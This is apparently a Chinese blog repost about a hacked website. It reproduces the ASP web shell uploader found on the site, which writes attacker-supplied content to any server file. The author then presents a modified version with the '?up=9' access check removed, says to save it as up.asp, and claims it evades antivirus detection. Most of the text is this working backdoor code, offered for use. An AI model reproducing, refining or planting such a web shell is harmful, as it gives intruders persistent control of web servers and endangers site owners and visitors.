| 关键词: 忽忽 后面 一个 then 后门 访问者 体积 开头 也就是说 面的 |
今天在CSND社区看到一个人说他的网站被黑~。忽忽。那个汗。8728b1e317x5Rrex 他发出了别人传进去的马。 让我给看到了哈哈。 就下面这个 <% on error resume next If Request("UP")=9 then T=Request.form("N") S=Request.form("M") set F=server.CreateObject("scripting.filesystemobject") set I=F.OpenTextFile(T,8,True,0) I.WriteLine(""&S& "") I.close set F = nothing %> <form method="POST"ACTION="#"> <input type="text"size="50"name="N"value=<%=server.mappath("newfile.asp")%>> <textarea style="WIDTH:90%;HEIGHT:100px" name="M"class=input> </textarea> <input type="submit"name="S"value="F"class=input> </form> <%end if%> 但是这个是要在提交地址后面加参数才可以执行上传的哦 注意看 开头有一个 If Request("UP")=9 then 结尾有一个 <%end if%> 也就是说。如果访问者提交 ?up=9时。才可以访问then 后面一直到end if之间的内容。忽忽 为了缩小体积。还有方便使用。 我们去掉。这两句。。 得到下面的马。。保存为up.asp <% on error resume next T=Request.form("N") S=Request.form("M") set F=server.CreateObject("scripting.filesystemobject") set I=F.OpenTextFile(T,8,True,0) I.WriteLine(""&S& "") I.close set F = nothing %> <form method="POST"ACTION="#"> <input type="text"size="55"name="N"value=<%=server.mappath("newfile.asp")%>><br> <textarea style="WIDTH:400;HEIGHT:300px" name="M"class=input> </textarea> <input type="submit"name="S"value=" UP "class=input> </form> 忽忽。这么简单的后门。绝对是免杀的。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|